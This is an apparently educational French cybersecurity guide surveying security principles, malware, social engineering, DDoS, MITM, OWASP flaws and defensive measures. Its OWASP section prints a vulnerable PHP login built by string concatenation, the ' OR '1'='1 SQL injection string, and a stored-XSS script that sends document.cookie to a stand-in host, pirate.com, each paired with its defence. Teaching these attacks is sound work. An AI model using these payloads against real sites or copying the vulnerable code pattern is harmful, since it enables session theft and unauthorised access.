Project Oxygen & Ideo-LabIDEO LAB Dashboard 2026

đŸ›Ąïž CybersĂ©curitĂ© – Attaques, DĂ©fense & SĂ©curitĂ© RĂ©seau

Guide complet IDEO-Lab sur les principes de la sécurité des systÚmes d'information.

1.1

Principes (Triade CIA)

Confidentialité, Intégrité, Disponibilité.

CIA Triad Confidentialité Intégrité
1.2

Concepts Clés

Vecteur d'attaque, Surface, Menace, Risque, Vulnérabilité.

Risque Vecteur CVE
1.3

Authentification (AAA)

Authentification, Autorisation, Traçabilité (Audit).

AAA AuthN AuthZ
2.1

Malwares : Virus & Vers

Virus (nécessite hÎte) vs Ver (Worm, se propage seul).

Malware Virus Worm
2.2

Malwares : Trojans & Rootkits

Cheval de Troie, Backdoor, Rootkit (accĂšs noyau).

Trojan Backdoor Rootkit
2.3

Malwares : Ransomware

Rançongiciel. Chiffrement des données contre rançon.

Ransomware Chiffrement
3.1

Ingénierie Sociale

Phishing (Hameçonnage), Spear Phishing (ciblé).

Phishing Ingénierie Sociale
3.2

Attaques (D)DoS

Denial of Service (Déni de service). Saturation.

DoS DDoS Botnet
3.3

Attaques (MITM)

Man-in-the-Middle. ARP Spoofing, SSL Stripping.

MITM ARP Spoofing
4.1

OWASP : Injection SQL

Injection de code SQL via formulaires (' OR '1'='1).

OWASP SQL Injection
4.2

OWASP : XSS

Cross-Site Scripting (Stored, Reflected, DOM).

OWASP XSS
4.3

OWASP Top 10

Le classement des failles web (CSRF, Broken Auth...).

OWASP Web App
5.1

Défense : Firewall & ACL

Filtrage L3/L4 (Stateless, Stateful), NGFW (L7).

Firewall ACL Stateful
5.2

Défense : DMZ

Zone Démilitarisée (Isolation des serveurs publics).

DMZ Architecture
5.3

Défense : IDS / IPS

Intrusion Detection System (Alerte) vs. Prevention (Blocage).

IDS IPS NGFW
6.1

Défense : VPN

Virtual Private Network (IPsec, SSL/TLS).

VPN Tunnel IPsec
6.2

Défense : IAM & MFA

Identity & Access Management, Multi-Factor Auth (2FA).

IAM MFA Zero Trust
6.3

Défense : Cryptographie

Symétrique (AES), Asymétrique (RSA), Hachage (SHA-256).

AES RSA Hash
7.1

Outils : SIEM & SOC

SIEM (Agrégation de logs), SOC (Centre Opérationnel).

SIEM SOC Logs
7.2

Stratégie : Pentest

Test d'intrusion (White/Black Box), Red/Blue Team.

Pentest Red Team Blue Team
7.3

Cheat-sheet

Bonnes pratiques (Mises Ă  jour, Backups, Moindre privilĂšge).

Checklist Best Practice
1.1 Principes (Triade CIA)

La cybersécurité vise à protéger les systÚmes d'information en garantissant trois principes fondamentaux, connus sous le nom de Triade CIA (ou DIC en français).

PrincipeSignificationObjectifAttaque Ciblée
ConfidentialitĂ© (Confidentiality)Seules les personnes autorisĂ©es peuvent accĂ©der aux donnĂ©es.EmpĂȘcher la divulgation non autorisĂ©e.Espionnage, MITM, Vol de donnĂ©es.
IntĂ©gritĂ© (Integrity)Les donnĂ©es sont exactes, complĂštes et n'ont pas Ă©tĂ© modifiĂ©es sans autorisation.EmpĂȘcher l'altĂ©ration non autorisĂ©e.Ransomware (chiffrement), modification de base de donnĂ©es.
DisponibilitĂ© (Availability)Le systĂšme et les donnĂ©es sont accessibles et fonctionnels lorsque l'utilisateur en a besoin.EmpĂȘcher l'interruption de service.Attaque (D)DoS, Ransomware (verrouillage).
1.2 Concepts Clés
TermeDescription
Actif (Asset)Toute donnée, appareil ou ressource ayant de la valeur (ex: base de données clients, serveur web).
Menace (Threat)Tout ce qui peut potentiellement nuire Ă  un actif (ex: un pirate, un malware, une inondation).
Vecteur d'AttaqueLe "chemin" utilisé par une menace pour atteindre l'actif (ex: un email de phishing, un port ouvert, une clé USB).
Surface d'AttaqueLa somme de tous les vecteurs d'attaque possibles (tous les points d'entrée).
VulnĂ©rabilitĂ© (CVE)Une faiblesse (bug, mauvaise configuration) dans un actif qui peut ĂȘtre exploitĂ©e par une menace. (RĂ©fĂ©rencĂ©e par un numĂ©ro CVE - Common Vulnerabilities and Exposures).
ExploitLe code ou la technique qui utilise une vulnérabilité pour déclencher l'attaque.
Risque (Risk)La probabilité qu'une menace exploite une vulnérabilité, multipliée par l'impact (le coût) si cela se produit. (Risque = Menace x Vulnérabilité x Impact).
1.3 Authentification (AAA)

AAA est le framework de base pour le contrĂŽle d'accĂšs.

1. Authentification (AuthN)

La question : "Qui ĂȘtes-vous ?"

C'est le processus de vérification de l'identité revendiquée par un utilisateur. On utilise des "facteurs" d'authentification :

  • Type 1 (Savoir) : Quelque chose que vous savez (Mot de passe, PIN).
  • Type 2 (Avoir) : Quelque chose que vous possĂ©dez (ClĂ© USB YubiKey, TĂ©lĂ©phone (TOTP)).
  • Type 3 (Être) : Quelque chose que vous ĂȘtes (Empreinte digitale, Visage).

MFA (Multi-Factor Authentication) : Utilise au moins 2 de ces 3 types (ex: Mot de passe + TOTP). (Voir 6.2).

2. Autorisation (AuthZ)

La question : "Qu'avez-vous le droit de faire ?"

Une fois authentifiĂ© (vous ĂȘtes bien "Bob"), ce processus dĂ©termine Ă  quelles ressources "Bob" a accĂšs.

Principe du Moindre PrivilĂšge (PoLP) : "Bob" (Comptable) ne doit avoir accĂšs qu'aux serveurs de compta, et non aux serveurs de R&D.

3. Traçabilité (Accounting / Audit)

La question : "Qu'avez-vous fait ?"

C'est l'enregistrement (logging) de toutes les actions effectuées par l'utilisateur (connexion, accÚs fichier, suppression).

Indispensable pour l'analyse forensique (enquĂȘte) aprĂšs un incident.

2.1 Malwares : Virus & Vers

Malware (Logiciel malveillant) est le terme générique.

Virus

Un virus est un code malveillant qui s'attache Ă  un fichier hĂŽte (ex: .exe, macro Word).

Propagation : Nécessite une action humaine pour se propager (ex: l'utilisateur doit exécuter le fichier infecté, ou ouvrir le document Word).

Ver (Worm)

Un ver est un malware autonome (standalone).

Propagation : Sa fonction principale est de se rĂ©pliquer lui-mĂȘme sur d'autres machines du rĂ©seau, sans intervention humaine. Il exploite activement les vulnĂ©rabilitĂ©s rĂ©seau (ex: WannaCry, Stuxnet).

Les vers sont extrĂȘmement dangereux car ils peuvent paralyser un rĂ©seau entier en quelques minutes.

2.2 Malwares : Chevaux de Troie & Rootkits
Cheval de Troie (Trojan)

Un malware qui se déguise en logiciel légitime (ex: un jeu gratuit, un "crack", un faux antivirus).

L'utilisateur l'exécute en pensant qu'il est inoffensif. Une fois lancé, le Trojan active sa charge utile (payload) malveillante.

Types de Payloads (Trojans)
  • Backdoor (Porte dĂ©robĂ©e) : Ouvre un accĂšs "secret" (ex: un port) pour que l'attaquant puisse revenir plus tard.
  • Spyware (Logiciel espion) : Vole des informations (ex: Keylogger - enregistre les frappes clavier).
  • Botnet : EnrĂŽle la machine dans un rĂ©seau "zombie" (utilisĂ© pour les attaques DDoS).
Rootkit

Un type de malware extrĂȘmement furtif, conçu pour cacher sa propre prĂ©sence (et celle d'autres malwares) sur le systĂšme.

Il opĂšre au niveau le plus bas du systĂšme (parfois mĂȘme au niveau du Noyau/Kernel) pour intercepter les appels systĂšme.

Exemple :
1. L'Antivirus demande au SystĂšme : "Liste les processus en cours".
2. Le Rootkit intercepte l'appel.
3. Le Rootkit renvoie la liste, mais *aprÚs avoir retiré*
   son propre processus (ex: "malware.exe") de la liste.
4. L'Antivirus ne voit rien.
2.3 Malwares : Ransomware (Rançongiciel)

Un Ransomware est un malware qui chiffre (crypte) les données de la victime (documents, photos, bases de données) et exige une rançon (généralement en cryptomonnaie) en échange de la clé de déchiffrement.

Types
  • Crypto-Ransomware : (Le plus courant) Chiffre les fichiers (ex: WannaCry, LockBit).
  • Locker-Ransomware : Verrouille l'Ă©cran de l'ordinateur (moins courant).
Double & Triple Extorsion

Les attaques modernes ne se contentent plus de chiffrer :

  1. Double Extorsion : Exfiltration (vol) des données *avant* de les chiffrer. L'attaquant menace de publier les données si la rançon n'est pas payée.
  2. Triple Extorsion : Ajoute une attaque DDoS sur le site public de la victime pour augmenter la pression.

Défense : La seule défense fiable est une sauvegarde (backup) hors ligne (immuable).

3.1 Attaques : Ingénierie Sociale (Phishing)

L'Ingénierie Sociale est l'art de manipuler la psychologie humaine (confiance, urgence, peur) pour contourner la sécurité. C'est souvent le vecteur d'attaque n°1.

TypeDescription
Phishing (Hameçonnage)Email de masse, non ciblé (ex: "Votre compte Netflix est bloqué, cliquez ici"). Tente de récupérer des identifiants (Credential Harvesting).
Spear PhishingPhishing ciblé (ex: un email semblant venir du PDG, destiné au service compta, demandant un virement urgent). TrÚs personnalisé.
Vishing / SmishingPhishing par Voix (Vishing) (appel téléphonique) ou SMS (Smishing).
Baiting (Appùt)Laisser traßner une clé USB infectée (Appùt physique) ou proposer un "film gratuit" (Appùt numérique).
3.2 Attaques : (D)DoS (Déni de Service)

Une attaque DoS (Denial of Service) vise Ă  rendre un service (ex: un site web) indisponible (voir "A" de la Triade CIA) en saturant ses ressources.

DoS (Denial of Service)

Une seule machine attaquante.

DDoS (Distributed DoS)

L'attaque est distribuée. L'attaquant utilise un Botnet (un réseau de milliers de machines zombies/infectées) pour lancer l'attaque simultanément. Impossible à bloquer (les IPs sources sont trop nombreuses).

Types d'attaques DDoS
  • VolumĂ©trique (L3/L4) : (Le plus courant) Inonder la bande passante de la victime (ex: SYN Flood, UDP Flood).
  • Applicative (L7) : (Plus furtif) Viser une ressource coĂ»teuse (ex: /recherche sur un site e-commerce) pour saturer le CPU ou la BDD.

Défense : Services "Anti-DDoS" (ex: Cloudflare, AWS Shield) qui absorbent et filtrent le trafic "sale".

3.3 Attaques : Man-in-the-Middle (MITM)

Une attaque MITM (Homme du Milieu) se produit lorsqu'un attaquant parvient à s'insérer secrÚtement au milieu d'une communication entre deux parties (ex: vous et votre banque), lui permettant d'écouter, de modifier ou de détourner le trafic.

Vecteurs d'attaque courants
  • ARP Spoofing (LAN) : Sur un LAN (ex: Wi-Fi public), l'attaquant envoie de faux paquets ARP (voir guide LAN) pour convaincre votre PC qu'il *est* le routeur (la passerelle). Tout votre trafic passe alors par le PC de l'attaquant.
  • SSL Stripping : Une attaque MITM qui force une connexion HTTPS (sĂ©curisĂ©e) Ă  basculer en HTTP (non sĂ©curisĂ©), permettant Ă  l'attaquant de lire le trafic en clair.
  • Evil Twin (Jumeau MalĂ©fique) : L'attaquant crĂ©e un faux Point d'AccĂšs Wi-Fi (ex: "Starbucks_Free_Wifi_") pour que les victimes s'y connectent.

Défense : HTTPS (SSL/TLS), HSTS, et ne jamais faire confiance à un Wi-Fi public.

4.1 OWASP : Injection SQL

Une faille d'injection SQL (OWASP Top 10) se produit lorsqu'une application inclut des donnĂ©es non fiables (venant d'un utilisateur) dans une requĂȘte de base de donnĂ©es, sans les valider ou les "Ă©chapper" correctement.

Code Vulnérable (PHP/SQL)

L'application veut vérifier un login/mot de passe :

$user = $_POST['username'];
$pass = $_POST['password'];

// VULNÉRABLE : ConcatĂ©nation de strings
$sql = "SELECT * FROM users WHERE user = '$user' AND pass = '$pass'";
$db->query($sql);
L'Attaque

L'attaquant n'a pas besoin de mot de passe. Il entre ceci dans le champ "username" :

' OR '1'='1

La requĂȘte SQL devient :

SELECT * FROM users WHERE user = '' OR '1'='1' --' AND pass = '...'

La condition '1'='1' est toujours vraie. La requĂȘte retourne tous les utilisateurs, et l'attaquant est connectĂ© (souvent en tant que premier utilisateur, l'admin).

Défense

RequĂȘtes PrĂ©parĂ©es (Prepared Statements) : Envoyer la "structure" SQL et les "donnĂ©es" (variables) sĂ©parĂ©ment. (Voir guide PHP).

4.2 OWASP : XSS (Cross-Site Scripting)

Une faille XSS (OWASP Top 10) se produit lorsqu'une application inclut des données non fiables (venant d'un utilisateur) dans sa page (HTML) cÎté client, sans les valider ou les "échapper" (encoder).

Cela permet à un attaquant d'exécuter du JavaScript arbitraire dans le navigateur de la victime.

XSS Stocké (Stored) - Le plus dangereux
  1. L'attaquant poste un commentaire sur un blog. Son commentaire est : <script>fetch('https://pirate.com/steal?cookie=' + document.cookie);</script>
  2. Le site (vulnérable) stocke ce script (brut) dans sa base de données.
  3. Une Victime (ex: un Admin) visite la page du blog.
  4. Le site affiche le commentaire de l'attaquant.
  5. Le navigateur de l'Admin exécute le script <script>...</script>.
  6. Le script vole le cookie de session de l'Admin et l'envoie au pirate (Session Hijacking).
XSS Reflété (Reflected)

Le payload (script) n'est pas stocké. Il est "reflété" par l'URL.

Exemple : Un site de recherche vulnérable /search.php?q=mon-terme qui affiche "Résultats pour: mon-terme".

  1. L'attaquant envoie un email de phishing Ă  la victime avec un lien :
  2. /search.php?q=<script>alert(1);</script>
  3. La victime clique. Le serveur (vulnérable) génÚre le HTML :
  4. <h1>Résultats pour: <script>alert(1);</script></h1>
  5. Le navigateur de la victime exécute le script.

DĂ©fense : Output Encoding. Échapper le HTML (ex: htmlspecialchars() en PHP) pour que < devienne &lt;.

4.3 OWASP Top 10

L'OWASP (Open Web Application Security Project) publie une liste (mise à jour réguliÚrement) des 10 risques de sécurité les plus critiques pour les applications web. C'est le standard de l'industrie.

Exemple (Liste 2021)
RangVulnérabilitéExemple
A01Broken Access ControlContrÎle d'accÚs défaillant (ex: un utilisateur normal accÚde à /admin).
A02Cryptographic FailuresMauvais chiffrement (ex: stockage de mots de passe en MD5).
A03Injection(Injection SQL, NoSQL, OS Command).
A04Insecure DesignProblÚmes de conception (architecture non sécurisée).
A05Security MisconfigurationMauvaise configuration (ex: ports ouverts, messages d'erreur verbeux).
A06Vulnerable ComponentsUtilisation de librairies (NPM, Maven) avec des failles connues (CVEs).
A07Identification/Authentication FailuresAuthentification défaillante (ex: pas de MFA, mots de passe faibles).
A08Software/Data Integrity FailuresIntégrité logicielle (ex: mise à jour non vérifiée).
A09Security Logging/Monitoring FailuresManque de logs ou de surveillance.
A10SSRF (Server-Side Request Forgery)L'attaquant force le serveur Ă  faire une requĂȘte (ex: vers une IP interne).
5.1 Défense : Firewall (Rappel)

Le Firewall est la premiÚre ligne de défense du réseau (périmÚtre).

  • Stateless (ACL) : (Voir 1.3 & 4.3) Filtrage L3/L4 simple.
  • Stateful (SPI) : (Voir 2.2) Filtrage L3/L4 intelligent, basĂ© sur l'Ă©tat des connexions. C'est le standard (Windows Firewall, iptables, pfSense...).
  • NGFW (Next-Gen) : (Voir 2.3) Filtrage L7 (Application). Peut bloquer "Facebook" ou des signatures de malwares.
5.2 Défense : Architecture DMZ

Une DMZ (Zone DĂ©militarisĂ©e) est un rĂ©seau "tampon" (une 3Ăšme zone de confiance) créé par un firewall. C'est la zone destinĂ©e Ă  hĂ©berger les serveurs qui doivent ĂȘtre accessibles depuis Internet (Untrust).

La RĂšgle d'Or de la DMZ

Le trafic est géré par des rÚgles strictes pour protéger le LAN (Trust) :

Interface 1: WAN (Untrust)
Interface 2: LAN (Trust)
Interface 3: DMZ (Semi-Trust) <- Serveur Web

RĂšgles de Firewall :
1. PERMIT WAN -> DMZ (Port 443)  (Internet voit le serveur web)
2. PERMIT LAN -> WAN (Sortie Internet)
3. PERMIT LAN -> DMZ (Les admins accĂšdent au serveur web)
4. DENY   DMZ -> LAN (La rĂšgle la plus importante !)

Si le serveur web (DMZ) est piraté, le pirate est bloqué dans la DMZ et ne peut pas atteindre le LAN.

5.3 Défense : IDS / IPS

Ces systĂšmes analysent le trafic (DPI) Ă  la recherche de signatures d'attaques connues (ex: exploits, scans de ports).

IDS (Intrusion Detection System)

Mode : Passif (Détection).

L'IDS "écoute" le trafic (ex: via un port "mirror" sur un switch) mais n'est pas dans le chemin.

S'il détecte une attaque : Il lÚve une alerte (envoie un email, un log SIEM).

IPS (Intrusion Prevention System)

Mode : Actif (Prévention).

L'IPS est dans le chemin du trafic (en ligne), souvent intégré au NGFW.

S'il détecte une attaque : Il bloque (drop) le paquet malveillant avant qu'il n'atteigne la cible.

6.1 Défense : VPN (Virtual Private Network)

Un VPN crée un "tunnel" crypté et privé à travers un réseau public (généralement Internet). Il garantit la Confidentialité et l'Intégrité du trafic.

VPN IPsec (Site-to-Site)

Utilisé pour connecter deux LANs (ex: Bureau Paris <-> Bureau Lyon) de maniÚre permanente. Le tunnel est géré par les routeurs/firewalls des deux sites.

Les utilisateurs n'ont rien à faire ; le trafic est automatiquement crypté et "tunnelé" par le routeur.

VPN SSL/TLS (Client-to-Site)

Utilisé par les télétravailleurs pour se connecter au réseau de l'entreprise.

L'utilisateur lance un logiciel client (ex: OpenVPN, Cisco AnyConnect) sur son PC, qui établit un tunnel sécurisé vers le firewall de l'entreprise.

6.2 Défense : IAM & MFA
IAM (Identity and Access Management)

L'IAM est le cadre (politiques, technologies) qui gÚre l'identité numérique (qui est qui) et les autorisations (qui a le droit de faire quoi).

C'est l'implémentation de l'AAA (voir 1.3) à grande échelle, souvent gérée par Active Directory (AD) ou des solutions cloud (Azure AD, Okta).

Principe clé : Moindre PrivilÚge (PoLP). Un utilisateur ne doit avoir que le minimum d'accÚs requis pour faire son travail.

MFA (Multi-Factor Authentication)

Le MFA (ou 2FA - Two-Factor) est la mesure de sécurité la plus efficace contre le vol d'identifiants (phishing).

Elle demande Ă  l'utilisateur de prouver son identitĂ© en utilisant au moins deux des trois types de facteurs (Savoir, Avoir, Être).

Exemple courant (2FA) :

  1. Facteur 1 (Savoir) : Mot de passe.
  2. Facteur 2 (Avoir) : Code TOTP (ex: Google Authenticator) ou Clé FIDO2 (YubiKey).
Zero Trust (Confiance Zéro)

C'est la philosophie de sécurité moderne.

Ancien modÚle ("Chùteau Fort") : "Difficile d'entrer (Firewall), mais une fois dedans (LAN), tout le monde est de confiance." (Désastreux si un attaquant rentre).

ModÚle Zero Trust : "Ne jamais faire confiance, toujours vérifier" (Never Trust, Always Verify).

  • Il n'y a plus de "rĂ©seau de confiance" (mĂȘme le LAN est hostile).
  • Chaque connexion (mĂȘme LAN -> LAN) doit ĂȘtre authentifiĂ©e (MFA) et autorisĂ©e.
  • La micro-segmentation (VLANs, Firewalls) est utilisĂ©e partout.
6.3 Défense : Cryptographie

La cryptographie est la base de la Confidentialité et de l'Intégrité.

TypeConceptAlgorithmesUsage
Hachage (Hash)Fonction à sens unique (non réversible). Vérifie l'intégrité (Checksum).MD5 (ObsolÚte), SHA-256Stockage de mots de passe, Signature de fichier.
SymétriqueUne seule clé (secrÚte) pour chiffrer ET déchiffrer. TrÚs rapide.DES (ObsolÚte), AESChiffrement de masse (disques durs, connexions VPN/TLS).
AsymĂ©triqueDeux clĂ©s (Paire) : 1 Publique (pour chiffrer), 1 PrivĂ©e (pour dĂ©chiffrer). Lent.RSA, ECCÉchange de la clĂ© symĂ©trique (le "Handshake" TLS), Signatures numĂ©riques.
7.1 Outils : SIEM & SOC
SIEM (Security Information & Event Management)

Un SIEM (ex: Splunk, ELK Stack) est un "aspirateur Ă  logs".

Il collecte, agrĂšge, et corrĂšle les logs de tous les appareils (Firewalls, Serveurs, AD, Switchs, PC) en un seul endroit.

Objectif : Détecter les menaces en corrélant des événements (ex: "50 logins échoués (AD)" + "suivis d'un scan de port (Firewall)" = Alerte !).

SOC (Security Operations Center)

Un SOC est l'équipe humaine (les analystes sécurité) qui surveille les alertes du SIEM (et autres outils) 24/7, trie les incidents, et répond aux attaques (Incident Response).

7.2 Stratégie : Pentest (Test d'Intrusion)

Un Pentest est un audit de sécurité offensif : une attaque simulée (et autorisée) contre un systÚme pour trouver des vulnérabilités avant que les vrais pirates ne les trouvent.

Types de Pentest (Niveau d'information)
  • Black Box (BoĂźte Noire) : L'attaquant n'a aucune information (juste le nom de l'entreprise). (Condition rĂ©elle).
  • Grey Box (BoĂźte Grise) : L'attaquant a des informations limitĂ©es (ex: un compte utilisateur normal).
  • White Box (BoĂźte Blanche) : L'attaquant a toutes les informations (Code source, schĂ©mas d'architecture). (Permet un audit en profondeur).
Red Team vs. Blue Team
  • Red Team (Attaque) : L'Ă©quipe "offensive" qui simule l'attaquant et tente de s'introduire.
  • Blue Team (DĂ©fense) : L'Ă©quipe "dĂ©fensive" (souvent le SOC) qui doit dĂ©tecter et bloquer la Red Team.
  • Purple Team : Exercice oĂč les deux Ă©quipes collaborent pour amĂ©liorer la dĂ©tection.
7.3 Cheat-sheet : Bonnes Pratiques (Défense en profondeur)
✅ PrĂ©vention (Utilisateur & AccĂšs)
  • MFA : Activer le Multi-Factor Authentication (MFA) partout (Admin, Email, VPN).
  • Moindre PrivilĂšge : Ne donnez que les droits minimums nĂ©cessaires.
  • Formation : Former les utilisateurs Ă  dĂ©tecter le Phishing.
  • Mots de passe : Politique de mots de passe robustes (longs) + Gestionnaire (Vault).
✅ PrĂ©vention (SystĂšme & RĂ©seau)
  • Patch Management : Mettre Ă  jour immĂ©diatement (OS, Logiciels, Librairies).
  • Firewall : Politique "Implicit Deny" (tout bloquer, n'autoriser que le nĂ©cessaire).
  • Segmentation : Utiliser des VLANs (ex: VLAN InvitĂ©s, VLAN IoT, VLAN Admin).
  • Backups (3-2-1) : 3 copies, sur 2 mĂ©dias diffĂ©rents, dont 1 hors site (offline/immuable). (Vital contre Ransomware).
  • Logging : Activer et centraliser les logs (SIEM).